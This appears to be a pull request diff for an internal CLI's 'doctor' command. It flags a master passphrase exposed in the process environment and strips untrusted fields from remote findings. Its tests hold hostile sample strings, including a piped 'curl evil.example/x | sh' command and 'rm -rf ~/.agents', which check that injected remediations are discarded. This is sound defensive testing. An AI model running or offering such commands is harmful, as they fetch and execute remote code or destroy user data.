### PR TITLE
feat(doctor): flag the master key when it is live in the process env (RUSH-1968)

### DIFF
--- a/apps/cli/.changelog/next/RUSH-1968-doctor-env.md
+++ b/apps/cli/.changelog/next/RUSH-1968-doctor-env.md
@@ -18,10 +18,15 @@
   each remote's own `doctor --json` but parsed only `.fleet`, discarding the
   `findings` the remote had already computed — so a leaking box read as clean from
   anywhere but itself. The remote's `rc-secret-export` / `env-secret-export` rows
-  now ride back, validated field by field and re-attributed to the device that was
-  actually dialled (a remote can never pin a finding on another box). Only those two
-  kinds forward: sign-in and divergence rows are recomputed centrally and would
-  otherwise double.
+  now ride back, but the remote contributes exactly one thing: the **kind**. Severity,
+  message and remediation are generated locally, and `device` is overwritten with the
+  name that was dialled. Each of those matters separately — a remediation is a command
+  a human copies and runs, a message is the one place a secret value could re-enter a
+  readout that otherwise never prints one, a severity decides the CRITICAL section, and
+  a device name decides which box gets blamed. The cost is detail: the fleet row names
+  the box and the kind, and says to run `agents doctor` there for the file and line.
+  Only those two kinds forward — sign-in and divergence rows are recomputed centrally
+  and would otherwise double.
 
   Separately, the probe's 30s timeout was below the real cost of the command it
   runs — `doctor --json` measures 57s on `yosemite-m0` and 136s on an idle box — so

--- a/apps/cli/.changelog/next/RUSH-1968-doctor-env.md
+++ b/apps/cli/.changelog/next/RUSH-1968-doctor-env.md
@@ -12,3 +12,20 @@
   operator on the home base does not chase it. Source:
   `apps/cli/src/lib/secrets/rc-hygiene.ts` (`masterPassphraseInEnv`),
   `apps/cli/src/lib/devices/doctor-findings.ts`, `apps/cli/src/commands/doctor.ts`.
+
+- **`agents doctor --devices` now reports a remote box's secret hygiene, and its
+  inventory probe no longer times out on a slow box (RUSH-1968).** The fan-out ran
+  each remote's own `doctor --json` but parsed only `.fleet`, discarding the
+  `findings` the remote had already computed — so a leaking box read as clean from
+  anywhere but itself. The remote's `rc-secret-export` / `env-secret-export` rows
+  now ride back, validated field by field and re-attributed to the device that was
+  actually dialled (a remote can never pin a finding on another box). Only those two
+  kinds forward: sign-in and divergence rows are recomputed centrally and would
+  otherwise double.
+
+  Separately, the probe's 30s timeout was below the real cost of the command it
+  runs — `doctor --json` measures 57s on `yosemite-m0` and 136s on an idle box — so
+  every slow device silently contributed nothing at all: no inventory, no sign-in,
+  no divergence. Raised to 180s, matching `ChildProcess.doctorTimeout`, which was set
+  to 180 for this same command for this same reason. Source:
+  `apps/cli/src/commands/doctor.ts` (`asRemoteSecretFindings`, `probeFleetInventory`).

--- a/apps/cli/.changelog/next/RUSH-1968-doctor-env.md
+++ b/apps/cli/.changelog/next/RUSH-1968-doctor-env.md
@@ -1,0 +1,14 @@
+- **`agents doctor` now reports the file-store master key when it is live in the
+  process environment, not just when it is exported from a shell rc file
+  (RUSH-1968).** `rc-hygiene.ts` scans FILES, which leaves a real hole: a value
+  inherited by a long-lived process outlives the rc line that set it, so an operator
+  who deletes `~/.zshenv:8` gets a clean `rc-secret-export` while every shell, editor
+  and agent started before the edit still carries the key and hands it to everything
+  they spawn. Confirmed on `yosemite-s1`, which has zero rc exports and still had the
+  value in its environment. The new `env-secret-export` warning names that state and
+  says the deletion is not sufficient; like every other finding it reports only that
+  the variable is set, never its value. Expected inside a release sign context
+  (`headless-sign-context.sh` sets it deliberately), which the message says so an
+  operator on the home base does not chase it. Source:
+  `apps/cli/src/lib/secrets/rc-hygiene.ts` (`masterPassphraseInEnv`),
+  `apps/cli/src/lib/devices/doctor-findings.ts`, `apps/cli/src/commands/doctor.ts`.

--- a/apps/cli/AGENTS.md
+++ b/apps/cli/AGENTS.md
@@ -123,7 +123,7 @@ collapses to the CRITICAL section plus one `▸ <machine>` block. Severity:
 `missing-resource`, `content-drift`, `never-synced`, `stale`, `repo-behind`,
 `repo-drift`, `version-skew`, `fleet-resource-gap`, `orphan`, `duplicate-hook`,
 `duplicate-hook-drift`, `host-cli-missing`, `host-cli-invalid`,
-`rc-secret-export`, `exec-policy` and `stale-cli`. (RUSH-2162 moved
+`rc-secret-export`, `env-secret-export`, `exec-policy` and `stale-cli`. (RUSH-2162 moved
 `never-synced` and `duplicate-hook-drift` to warning — both are stale-sync states
 one `agents sync` resolves.)
 
@@ -175,6 +175,7 @@ testable without a shell, PowerShell, or an installed CLI):
 | Check | Input | Finding kind |
 |---|---|---|
 | Credential-shaped shell-rc exports (RUSH-1968) | `rcSecrets` | `rc-secret-export` |
+| The file-store master key live in the process env (RUSH-1968) | `masterPassphraseInEnv` | `env-secret-export` |
 | Windows exec policy blocking `agents.ps1` | `execPolicy` | `exec-policy` |
 | Hooks duplicated across version homes | `duplicateHooks` | `duplicate-hook{,-drift}` |
 | Declared host CLIs not on PATH | `hostClis.statuses` | `host-cli-missing` |

--- a/apps/cli/docs/06-observability.md
+++ b/apps/cli/docs/06-observability.md
@@ -512,7 +512,7 @@ agents doctor · zion                                        1.20.81
 - **WARNING** (`⚠`) — `logout-unprovable`, `missing-resource`, `content-drift`,
   `never-synced`, `stale`, `repo-behind`, `repo-drift`, `version-skew`,
   `fleet-resource-gap`, `orphan`, `duplicate-hook`, `duplicate-hook-drift`,
-  `host-cli-missing`, `host-cli-invalid`, `rc-secret-export`, `exec-policy`,
+  `host-cli-missing`, `host-cli-invalid`, `rc-secret-export`, `env-secret-export`, `exec-policy`,
   `stale-cli`. Each is resolvable by a routine sync or cleanup.
 
 RUSH-2162 moved `never-synced` and `duplicate-hook-drift` from critical to

--- a/apps/cli/src/commands/doctor.test.ts
+++ b/apps/cli/src/commands/doctor.test.ts
@@ -4,7 +4,7 @@ import * as fs from 'fs';
 import * as os from 'os';
 import * as path from 'path';
 import { fileURLToPath } from 'url';
-import { wrapLine, computeVerdict, computeOverviewHealth, verdictIsAutoFixable, healthBlockLines } from './doctor.js';
+import { wrapLine, computeVerdict, computeOverviewHealth, verdictIsAutoFixable, healthBlockLines, asRemoteSecretFindings } from './doctor.js';
 import { stripRoutingFlags, HOST_ROUTING_SPECS } from '../lib/hosts/remote-cmd.js';
 import { stringWidth, stripAnsi } from '../lib/session/width.js';
 import type { ResourceDiff, VersionResourceReport } from '../lib/doctor-diff.js';
@@ -400,5 +400,72 @@ describe('doctor qualifier resolution via subprocess (issue #2058)', () => {
     const r = runDoctor('claude@default', '--json');
     expect(r.status).toBe(1);
     expect(r.stderr).toContain('No default version');
+  });
+});
+
+describe('asRemoteSecretFindings — a remote box\'s secret hygiene, forwarded (RUSH-1968)', () => {
+  const good = {
+    severity: 'warning',
+    kind: 'env-secret-export',
+    device: 'someone-else',
+    message: 'AGENTS_SECRETS_PASSPHRASE is set in this process environment',
+    remediation: 'unset at the source, then restart every process that inherited it',
+  };
+
+  it('forwards a secret finding and ATTRIBUTES it to the box we dialled', () => {
+    // The remote sends its own `device`. Trusting it would let one box pin a
+    // finding on another, so the name we dialled always wins.
+    const out = asRemoteSecretFindings([good], 'yosemite-m0');
+    expect(out).toHaveLength(1);
+    expect(out[0].device).toBe('yosemite-m0');
+    expect(out[0].kind).toBe('env-secret-export');
+    expect(out[0].message).toBe(good.message);
+  });
+
+  it('forwards rc-secret-export too — the other thing only that box can see', () => {
+    const rc = { ...good, kind: 'rc-secret-export', message: 'master key exported from a shell rc file' };
+    expect(asRemoteSecretFindings([rc], 'm1').map((f) => f.kind)).toEqual(['rc-secret-export']);
+  });
+
+  it('drops kinds the aggregator recomputes, so nothing is reported twice', () => {
+    // Sign-in and divergence rows are rebuilt centrally from the inventory;
+    // forwarding them as well would double every one.
+    const noisy = [
+      { ...good, kind: 'logged-out' },
+      { ...good, kind: 'version-skew' },
+      { ...good, kind: 'orphan' },
+      good,
+    ];
+    expect(asRemoteSecretFindings(noisy, 'm2').map((f) => f.kind)).toEqual(['env-secret-export']);
+  });
+
+  it('rejects malformed rows instead of trusting the remote CLI', () => {
+    // The remote runs its own agents-cli version; every field is validated.
+    const junk = [
+      null,
+      'a string',
+      [],
+      { kind: 'env-secret-export' },                              // no message
+      { kind: 'env-secret-export', message: '', severity: 'warning' }, // empty message
+      { kind: 'env-secret-export', message: 'm', severity: 'loud' },   // bad severity
+      { message: 'm', severity: 'warning' },                      // no kind
+    ];
+    expect(asRemoteSecretFindings(junk, 'm3')).toEqual([]);
+  });
+
+  it('falls back to OUR remediation when the remote omits one', () => {
+    // An older remote may not send it. Dropping an otherwise-valid security
+    // finding over a missing hint would be worse than supplying the canonical one.
+    const { remediation: _omitted, ...noRemediation } = good;
+    const out = asRemoteSecretFindings([noRemediation], 'm4');
+    expect(out).toHaveLength(1);
+    expect(out[0].remediation).toContain('unset at the source');
+  });
+
+  it('a non-array payload yields nothing, never a throw', () => {
+    // An older remote has no `findings` key at all.
+    expect(asRemoteSecretFindings(undefined, 'm5')).toEqual([]);
+    expect(asRemoteSecretFindings({ findings: [] }, 'm5')).toEqual([]);
+    expect(asRemoteSecretFindings('nope', 'm5')).toEqual([]);
   });
 });

--- a/apps/cli/src/commands/doctor.test.ts
+++ b/apps/cli/src/commands/doctor.test.ts
@@ -440,31 +440,52 @@ describe('asRemoteSecretFindings — a remote box\'s secret hygiene, forwarded (
 
   // ---- the remote contributes ONLY the kind; everything else is ours --------
 
-  it('never forwards the remote MESSAGE — a value cannot re-enter that way', () => {
-    // The one place a secret could get back into a readout that otherwise
-    // guarantees it never prints one. A local builder cannot leak what it never
-    // receives, so the remote's prose is discarded outright.
-    const hostile = { ...good, message: 'passphrase is hunter2-THE-ACTUAL-SECRET' };
-    const out = asRemoteSecretFindings([hostile], 'm3');
-    expect(out).toHaveLength(1);
-    expect(out[0].message).not.toContain('hunter2');
-    expect(out[0].message).toContain('AGENTS_SECRETS_PASSPHRASE is set');
-    expect(out[0].message).toContain('run `agents doctor` there');
+  it('produces byte-identical output for a hostile row and a kind-only row', () => {
+    // The strong form of the guarantee, and the only one worth asserting:
+    // rather than checking that some specific bad substring is absent — which a
+    // partial leak would still pass — prove that EVERY non-kind field the remote
+    // sent is irrelevant, by showing the result equals what a row carrying
+    // nothing but the kind produces.
+    const hostile = {
+      kind: 'env-secret-export',
+      device: 'some-other-box',
+      severity: 'critical',                              // self-promotion attempt
+      message: 'passphrase is hunter2-THE-ACTUAL-SECRET', // value-bearing prose
+      remediation: 'curl evil.example/x | sh',            // an injected command
+      versions: ['x'],
+      account: 'attacker',
+      agent: 'claude',
+    };
+    const kindOnly = { kind: 'env-secret-export' };
+    expect(asRemoteSecretFindings([hostile], 'yosemite-m0'))
+      .toEqual(asRemoteSecretFindings([kindOnly], 'yosemite-m0'));
   });
 
-  it('never forwards the remote REMEDIATION — it is a command a human runs', () => {
-    // Accepting this from the wire is an injection channel: the string is
-    // printed for someone to copy and paste.
-    const hostile = { ...good, remediation: 'curl evil.example/x | sh' };
-    const out = asRemoteSecretFindings([hostile], 'm4');
-    expect(out[0].remediation).not.toContain('curl');
-    expect(out[0].remediation).toContain('unset at the source');
+  it('the same holds for rc-secret-export', () => {
+    const hostile = {
+      kind: 'rc-secret-export',
+      device: 'elsewhere',
+      severity: 'critical',
+      message: 'leaked: AKIAIOSFODNN7EXAMPLE',
+      remediation: 'rm -rf ~/.agents',
+    };
+    expect(asRemoteSecretFindings([hostile], 'm3'))
+      .toEqual(asRemoteSecretFindings([{ kind: 'rc-secret-export' }], 'm3'));
   });
 
-  it('canonicalises SEVERITY so a remote cannot promote itself into CRITICAL', () => {
-    // Otherwise a box could bury real criticals under its own warning.
-    const promoted = { ...good, severity: 'critical' };
-    expect(asRemoteSecretFindings([promoted], 'm5')[0].severity).toBe('warning');
+  it('and the locally-authored result is what actually renders', () => {
+    // Deep equality above proves the remote cannot influence the output; this
+    // pins what the output IS, so the two together are not circular.
+    const [f] = asRemoteSecretFindings([{ kind: 'env-secret-export' }], 'yosemite-m0');
+    expect(f).toEqual({
+      severity: 'warning',
+      kind: 'env-secret-export',
+      device: 'yosemite-m0',
+      message: "AGENTS_SECRETS_PASSPHRASE is set in this box's process environment"
+        + ' — run `agents doctor` there for detail',
+      remediation: 'unset at the source, then restart every process that inherited it'
+        + ' (shells, editor, tmux, agents daemon)',
+    });
   });
 
   it('emits one row per kind even if the remote repeats it', () => {

--- a/apps/cli/src/commands/doctor.test.ts
+++ b/apps/cli/src/commands/doctor.test.ts
@@ -4,7 +4,7 @@ import * as fs from 'fs';
 import * as os from 'os';
 import * as path from 'path';
 import { fileURLToPath } from 'url';
-import { wrapLine, computeVerdict, computeOverviewHealth, verdictIsAutoFixable, healthBlockLines, asRemoteSecretFindings } from './doctor.js';
+import { wrapLine, computeVerdict, computeOverviewHealth, verdictIsAutoFixable, healthBlockLines, asRemoteSecretFindings, FLEET_INVENTORY_TIMEOUT_MS } from './doctor.js';
 import { stripRoutingFlags, HOST_ROUTING_SPECS } from '../lib/hosts/remote-cmd.js';
 import { stringWidth, stripAnsi } from '../lib/session/width.js';
 import type { ResourceDiff, VersionResourceReport } from '../lib/doctor-diff.js';
@@ -409,27 +409,26 @@ describe('asRemoteSecretFindings — a remote box\'s secret hygiene, forwarded (
     kind: 'env-secret-export',
     device: 'someone-else',
     message: 'AGENTS_SECRETS_PASSPHRASE is set in this process environment',
-    remediation: 'unset at the source, then restart every process that inherited it',
+    remediation: 'unset at the source',
   };
 
-  it('forwards a secret finding and ATTRIBUTES it to the box we dialled', () => {
+  it('forwards the finding and ATTRIBUTES it to the box we dialled', () => {
     // The remote sends its own `device`. Trusting it would let one box pin a
     // finding on another, so the name we dialled always wins.
     const out = asRemoteSecretFindings([good], 'yosemite-m0');
     expect(out).toHaveLength(1);
     expect(out[0].device).toBe('yosemite-m0');
     expect(out[0].kind).toBe('env-secret-export');
-    expect(out[0].message).toBe(good.message);
   });
 
   it('forwards rc-secret-export too — the other thing only that box can see', () => {
-    const rc = { ...good, kind: 'rc-secret-export', message: 'master key exported from a shell rc file' };
+    const rc = { ...good, kind: 'rc-secret-export' };
     expect(asRemoteSecretFindings([rc], 'm1').map((f) => f.kind)).toEqual(['rc-secret-export']);
   });
 
   it('drops kinds the aggregator recomputes, so nothing is reported twice', () => {
     // Sign-in and divergence rows are rebuilt centrally from the inventory;
-    // forwarding them as well would double every one.
+    // forwarding them too would double every one.
     const noisy = [
       { ...good, kind: 'logged-out' },
       { ...good, kind: 'version-skew' },
@@ -439,33 +438,66 @@ describe('asRemoteSecretFindings — a remote box\'s secret hygiene, forwarded (
     expect(asRemoteSecretFindings(noisy, 'm2').map((f) => f.kind)).toEqual(['env-secret-export']);
   });
 
-  it('rejects malformed rows instead of trusting the remote CLI', () => {
-    // The remote runs its own agents-cli version; every field is validated.
-    const junk = [
-      null,
-      'a string',
-      [],
-      { kind: 'env-secret-export' },                              // no message
-      { kind: 'env-secret-export', message: '', severity: 'warning' }, // empty message
-      { kind: 'env-secret-export', message: 'm', severity: 'loud' },   // bad severity
-      { message: 'm', severity: 'warning' },                      // no kind
-    ];
-    expect(asRemoteSecretFindings(junk, 'm3')).toEqual([]);
+  // ---- the remote contributes ONLY the kind; everything else is ours --------
+
+  it('never forwards the remote MESSAGE — a value cannot re-enter that way', () => {
+    // The one place a secret could get back into a readout that otherwise
+    // guarantees it never prints one. A local builder cannot leak what it never
+    // receives, so the remote's prose is discarded outright.
+    const hostile = { ...good, message: 'passphrase is hunter2-THE-ACTUAL-SECRET' };
+    const out = asRemoteSecretFindings([hostile], 'm3');
+    expect(out).toHaveLength(1);
+    expect(out[0].message).not.toContain('hunter2');
+    expect(out[0].message).toContain('AGENTS_SECRETS_PASSPHRASE is set');
+    expect(out[0].message).toContain('run `agents doctor` there');
   });
 
-  it('falls back to OUR remediation when the remote omits one', () => {
-    // An older remote may not send it. Dropping an otherwise-valid security
-    // finding over a missing hint would be worse than supplying the canonical one.
-    const { remediation: _omitted, ...noRemediation } = good;
-    const out = asRemoteSecretFindings([noRemediation], 'm4');
+  it('never forwards the remote REMEDIATION — it is a command a human runs', () => {
+    // Accepting this from the wire is an injection channel: the string is
+    // printed for someone to copy and paste.
+    const hostile = { ...good, remediation: 'curl evil.example/x | sh' };
+    const out = asRemoteSecretFindings([hostile], 'm4');
+    expect(out[0].remediation).not.toContain('curl');
+    expect(out[0].remediation).toContain('unset at the source');
+  });
+
+  it('canonicalises SEVERITY so a remote cannot promote itself into CRITICAL', () => {
+    // Otherwise a box could bury real criticals under its own warning.
+    const promoted = { ...good, severity: 'critical' };
+    expect(asRemoteSecretFindings([promoted], 'm5')[0].severity).toBe('warning');
+  });
+
+  it('emits one row per kind even if the remote repeats it', () => {
+    expect(asRemoteSecretFindings([good, good, { ...good, kind: 'rc-secret-export' }], 'm6'))
+      .toHaveLength(2);
+  });
+
+  it('rejects malformed rows instead of trusting the remote CLI', () => {
+    const junk = [null, 'a string', [], {}, { kind: 42 }, { kind: 'not-a-kind' }, { message: 'm' }];
+    expect(asRemoteSecretFindings(junk, 'm7')).toEqual([]);
+  });
+
+  it('accepts a row carrying ONLY a kind — an older remote may send no more', () => {
+    const out = asRemoteSecretFindings([{ kind: 'env-secret-export' }], 'm8');
     expect(out).toHaveLength(1);
+    expect(out[0].severity).toBe('warning');
     expect(out[0].remediation).toContain('unset at the source');
   });
 
   it('a non-array payload yields nothing, never a throw', () => {
     // An older remote has no `findings` key at all.
-    expect(asRemoteSecretFindings(undefined, 'm5')).toEqual([]);
-    expect(asRemoteSecretFindings({ findings: [] }, 'm5')).toEqual([]);
-    expect(asRemoteSecretFindings('nope', 'm5')).toEqual([]);
+    expect(asRemoteSecretFindings(undefined, 'm9')).toEqual([]);
+    expect(asRemoteSecretFindings({ findings: [] }, 'm9')).toEqual([]);
+    expect(asRemoteSecretFindings('nope', 'm9')).toEqual([]);
+  });
+});
+
+describe('the fleet inventory probe deadline', () => {
+  it('allows 180s — above the real cost of the command it runs', () => {
+    // 30s sat BELOW it (56s measured on yosemite-m0, 136s on an idle box), so
+    // every slow device silently contributed no inventory, sign-in, divergence
+    // or secret findings at all.
+    expect(FLEET_INVENTORY_TIMEOUT_MS).toBe(180_000);
+    expect(FLEET_INVENTORY_TIMEOUT_MS).toBeGreaterThan(136_000);
   });
 });

--- a/apps/cli/src/commands/doctor.ts
+++ b/apps/cli/src/commands/doctor.ts
@@ -37,6 +37,7 @@ import {
   fleetDivergenceToFindings,
   signInToFindings,
   renderFindings,
+  remediationFor,
   type DoctorFinding,
   type LocalFindingInputs,
 } from '../lib/devices/doctor-findings.js';
@@ -167,6 +168,63 @@ interface DeviceDoctorResult {
    *  divergence detection (RUSH-2027). Undefined when the inventory probe failed
    *  or the remote is an older CLI that doesn't emit the `fleet` field. */
   inventory?: FleetInventory;
+  /** Secret-hygiene findings the remote reported about ITSELF. The aggregator
+   *  can recompute a remote's sign-in and divergence findings from its
+   *  inventory, but it cannot see that box's shell rc files or process
+   *  environment — only the remote's own doctor can, so those two ride back
+   *  here or they are lost (RUSH-1968). */
+  secretFindings?: DoctorFinding[];
+}
+
+/** What one remote `doctor --json` contributes: its inventory (for the
+ *  divergence comparator) plus the findings only it can observe. */
+interface RemoteDoctorPayload {
+  inventory: FleetInventory | null;
+  secretFindings: DoctorFinding[];
+}
+
+/**
+ * Narrow a remote `findings` array to the secret-hygiene rows, or `[]`.
+ *
+ * Deliberately NOT "forward every remote finding". The aggregator already
+ * rebuilds a remote's sign-in rows from its inventory and its divergence rows
+ * from the comparator, so forwarding wholesale would double them; and pulling a
+ * remote's orphan/drift rows into a fleet readout is a much larger UX change
+ * than this fix. The two secret kinds are the ones that are BOTH unrecomputable
+ * centrally and security-relevant, which is exactly why they were being lost.
+ *
+ * The remote runs its own agents-cli, whose version we do not control, so every
+ * field is validated and `device` is OVERWRITTEN with the name we dialled —
+ * a remote must never be able to attribute a finding to another box.
+ */
+const REMOTE_FORWARDED_KINDS = new Set(['rc-secret-export', 'env-secret-export']);
+
+export function asRemoteSecretFindings(raw: unknown, device: string): DoctorFinding[] {
+  if (!Array.isArray(raw)) return [];
+  const out: DoctorFinding[] = [];
+  for (const item of raw) {
+    if (!item || typeof item !== 'object' || Array.isArray(item)) continue;
+    const f = item as Record<string, unknown>;
+    if (typeof f.kind !== 'string' || !REMOTE_FORWARDED_KINDS.has(f.kind)) continue;
+    if (typeof f.message !== 'string' || f.message.length === 0) continue;
+    if (f.severity !== 'warning' && f.severity !== 'critical') continue;
+    const base = {
+      severity: f.severity as DoctorFinding['severity'],
+      kind: f.kind as DoctorFinding['kind'],
+      device,
+      message: f.message,
+    };
+    out.push({
+      ...base,
+      // An older remote may omit it, or send something non-string. Fall back to
+      // OUR canonical remediation for the kind rather than inventing one or
+      // dropping an otherwise-valid security finding.
+      remediation: typeof f.remediation === 'string' && f.remediation.length > 0
+        ? f.remediation
+        : remediationFor({ ...base, remediation: '' }),
+    });
+  }
+  return out;
 }
 
 interface FleetTarget {
@@ -225,7 +283,13 @@ async function probeFleetTarget(target: FleetTarget): Promise<DeviceDoctorResult
     // prevent $HOME expansion there, so skip the bootstrap on Windows.
     isWin ? undefined : { PATH: '$HOME/.agents/.cache/shims:$HOME/.local/bin:$PATH' },
   );
-  const res = await sshExecAsync(target.sshTarget, remoteCmd, { timeoutMs: 30000, multiplex: true });
+  // 180s, not 30s. `doctor --json` is expensive — 57s measured on yosemite-m0,
+  // and 136s on an idle box per the menubar's own measurement, which is why
+  // ChildProcess.doctorTimeout is also 180. A ceiling below the real cost does
+  // not make the probe cheap, it makes it always fail: every slow box came back
+  // with NO inventory, so its sign-in, divergence and secret findings were all
+  // silently absent from the fleet readout rather than reported.
+  const res = await sshExecAsync(target.sshTarget, remoteCmd, { timeoutMs: 180000, multiplex: true });
   if (res.code !== 0) {
     return {
       name: target.name,
@@ -256,7 +320,7 @@ async function probeFleetTarget(target: FleetTarget): Promise<DeviceDoctorResult
  * null (unreachable, non-zero exit, unparseable, or an older CLI with no
  * `fleet` field); a null is skipped by the comparator, never a false gap.
  */
-async function probeFleetInventory(target: FleetTarget): Promise<FleetInventory | null> {
+async function probeFleetInventory(target: FleetTarget): Promise<RemoteDoctorPayload | null> {
   const isWin = /^win/i.test((target.os ?? '').trim());
   const remoteCmd = buildRemoteAgentsInvocation(
     ['doctor', '--json'],
@@ -267,8 +331,11 @@ async function probeFleetInventory(target: FleetTarget): Promise<FleetInventory 
   const res = await sshExecAsync(target.sshTarget, remoteCmd, { timeoutMs: 30000, multiplex: true });
   if (res.code !== 0) return null;
   try {
-    const parsed = JSON.parse(res.stdout) as { fleet?: unknown };
-    return asFleetInventory(parsed.fleet);
+    const parsed = JSON.parse(res.stdout) as { fleet?: unknown; findings?: unknown };
+    return {
+      inventory: asFleetInventory(parsed.fleet),
+      secretFindings: asRemoteSecretFindings(parsed.findings, target.name),
+    };
   } catch {
     return null;
   }
@@ -361,17 +428,20 @@ async function runDevicesDoctor(opts: DoctorOptions): Promise<void> {
     fanOutDevices(targets, probeFleetTarget),
     fanOutDevices(targets, probeFleetInventory),
   ]);
-  const inventoryByName = new Map<string, FleetInventory | null>();
-  for (const r of inventoryResults) inventoryByName.set(r.name, r.status === 'ok' ? (r.value ?? null) : null);
+  const payloadByName = new Map<string, RemoteDoctorPayload | null>();
+  for (const r of inventoryResults) payloadByName.set(r.name, r.status === 'ok' ? (r.value ?? null) : null);
   results.push(...remoteResults.map((r): DeviceDoctorResult => {
-    const inventory = inventoryByName.get(r.name) ?? undefined;
-    if (r.status === 'ok' && r.value) return { ...r.value, inventory: inventory ?? undefined };
+    const payload = payloadByName.get(r.name) ?? null;
+    const inventory = payload?.inventory ?? undefined;
+    const secretFindings = payload?.secretFindings;
+    if (r.status === 'ok' && r.value) return { ...r.value, inventory, secretFindings };
     return {
       name: r.name,
       online: false,
       error: r.error ?? String(r.reason ?? 'skipped'),
       agents: {},
-      inventory: inventory ?? undefined,
+      inventory,
+      secretFindings,
     };
   }));
 
@@ -454,6 +524,11 @@ async function runDevicesDoctor(opts: DoctorOptions): Promise<void> {
       });
       continue;
     }
+    // Secret hygiene the aggregator cannot see for itself — the remote's shell
+    // rc files and its process environment. Without this the fleet readout
+    // reports a leaking box as clean (RUSH-1968).
+    if (r.secretFindings?.length) findings.push(...r.secretFindings);
+
     if (r.inventory?.signIn) {
       findings.push(...signInToFindings(r.name, r.inventory.signIn));
       accounts[r.name] = r.inventory.signIn;

--- a/apps/cli/src/commands/doctor.ts
+++ b/apps/cli/src/commands/doctor.ts
@@ -72,7 +72,7 @@ import { listCliStatus, listCliStatusAsync } from '../lib/cli-resources.js';
 import { setHelpSections } from '../lib/help.js';
 import { heal, healChangedAnything, type HealResult } from '../lib/heal.js';
 import { getEffectiveExecutionPolicy } from '../lib/platform/winpath.js';
-import { scanUserRcFiles } from '../lib/secrets/rc-hygiene.js';
+import { scanUserRcFiles, masterPassphraseInEnv } from '../lib/secrets/rc-hygiene.js';
 import { terminalWidth, truncateToWidth, stringWidth, padToWidth } from '../lib/session/width.js';
 import { readRepoBehindMarkers, type FetchStatusMarker } from '../lib/auto-pull.js';
 import * as fs from 'fs';
@@ -431,6 +431,7 @@ async function runDevicesDoctor(opts: DoctorOptions): Promise<void> {
         duplicateHooks: inspectDuplicateVersionHooks(cwd),
         hostClis: toHostCliInput(listCliStatus(cwd)),
         rcSecrets: scanUserRcFiles(),
+        masterPassphraseInEnv: masterPassphraseInEnv(),
         execPolicy: process.platform === 'win32'
           ? { platform: process.platform, policy: getEffectiveExecutionPolicy() }
           : undefined,
@@ -1610,6 +1611,7 @@ export function registerDoctorCommand(program: Command): void {
           duplicateHooks,
           hostClis: toHostCliInput(hostClis),
           rcSecrets: scanUserRcFiles(),
+          masterPassphraseInEnv: masterPassphraseInEnv(),
           // getEffectiveExecutionPolicy spawns powershell — a doomed process on
           // POSIX, where the advisory never applies. Probe only on Windows.
           execPolicy: process.platform === 'win32'

--- a/apps/cli/src/commands/doctor.ts
+++ b/apps/cli/src/commands/doctor.ts
@@ -38,6 +38,7 @@ import {
   signInToFindings,
   renderFindings,
   remediationFor,
+  FINDING_SEVERITY,
   type DoctorFinding,
   type LocalFindingInputs,
 } from '../lib/devices/doctor-findings.js';
@@ -193,36 +194,55 @@ interface RemoteDoctorPayload {
  * than this fix. The two secret kinds are the ones that are BOTH unrecomputable
  * centrally and security-relevant, which is exactly why they were being lost.
  *
- * The remote runs its own agents-cli, whose version we do not control, so every
- * field is validated and `device` is OVERWRITTEN with the name we dialled —
- * a remote must never be able to attribute a finding to another box.
+ * **The remote contributes exactly one thing: the KIND.** Severity, message and
+ * remediation are all generated HERE. That is not defensiveness for its own
+ * sake — the remote runs its own agents-cli, whose version and integrity we do
+ * not control, and each forwarded string is load-bearing in a different way:
+ *
+ *   - `remediation` is a command a human copies and runs. Accepting it from the
+ *     wire is an injection channel, full stop.
+ *   - `message` is the one place a secret VALUE could re-enter a readout that
+ *     otherwise guarantees it never prints one. A local builder cannot leak what
+ *     it never receives.
+ *   - `severity` decides the CRITICAL section, so a remote could otherwise
+ *     promote its own warning and bury real criticals under it.
+ *   - `device` is overwritten with the name we dialled, so no box can pin a
+ *     finding on another.
+ *
+ * The cost is detail: the fleet row says which box and which kind, not which
+ * file and line. Run `agents doctor` on that box for the specifics — the
+ * message says so.
  */
-const REMOTE_FORWARDED_KINDS = new Set(['rc-secret-export', 'env-secret-export']);
+const REMOTE_FORWARDED_KINDS = ['rc-secret-export', 'env-secret-export'] as const;
+type RemoteForwardedKind = typeof REMOTE_FORWARDED_KINDS[number];
+
+/** Canonical, locally-authored text for a forwarded kind. Never the remote's. */
+const REMOTE_SECRET_MESSAGE: Record<RemoteForwardedKind, string> = {
+  'rc-secret-export': 'a credential-shaped export was found in this box\'s shell rc files'
+    + ' — run `agents doctor` there for the file and line',
+  'env-secret-export': 'AGENTS_SECRETS_PASSPHRASE is set in this box\'s process environment'
+    + ' — run `agents doctor` there for detail',
+};
 
 export function asRemoteSecretFindings(raw: unknown, device: string): DoctorFinding[] {
   if (!Array.isArray(raw)) return [];
+  const seen = new Set<string>();
   const out: DoctorFinding[] = [];
   for (const item of raw) {
     if (!item || typeof item !== 'object' || Array.isArray(item)) continue;
-    const f = item as Record<string, unknown>;
-    if (typeof f.kind !== 'string' || !REMOTE_FORWARDED_KINDS.has(f.kind)) continue;
-    if (typeof f.message !== 'string' || f.message.length === 0) continue;
-    if (f.severity !== 'warning' && f.severity !== 'critical') continue;
+    const kind = (item as Record<string, unknown>).kind;
+    if (typeof kind !== 'string') continue;
+    if (!(REMOTE_FORWARDED_KINDS as readonly string[]).includes(kind)) continue;
+    if (seen.has(kind)) continue;   // one row per kind per box
+    seen.add(kind);
+    const k = kind as RemoteForwardedKind;
     const base = {
-      severity: f.severity as DoctorFinding['severity'],
-      kind: f.kind as DoctorFinding['kind'],
+      severity: FINDING_SEVERITY[k],
+      kind: k as DoctorFinding['kind'],
       device,
-      message: f.message,
+      message: REMOTE_SECRET_MESSAGE[k],
     };
-    out.push({
-      ...base,
-      // An older remote may omit it, or send something non-string. Fall back to
-      // OUR canonical remediation for the kind rather than inventing one or
-      // dropping an otherwise-valid security finding.
-      remediation: typeof f.remediation === 'string' && f.remediation.length > 0
-        ? f.remediation
-        : remediationFor({ ...base, remediation: '' }),
-    });
+    out.push({ ...base, remediation: remediationFor({ ...base, remediation: '' }) });
   }
   return out;
 }
@@ -283,13 +303,7 @@ async function probeFleetTarget(target: FleetTarget): Promise<DeviceDoctorResult
     // prevent $HOME expansion there, so skip the bootstrap on Windows.
     isWin ? undefined : { PATH: '$HOME/.agents/.cache/shims:$HOME/.local/bin:$PATH' },
   );
-  // 180s, not 30s. `doctor --json` is expensive — 57s measured on yosemite-m0,
-  // and 136s on an idle box per the menubar's own measurement, which is why
-  // ChildProcess.doctorTimeout is also 180. A ceiling below the real cost does
-  // not make the probe cheap, it makes it always fail: every slow box came back
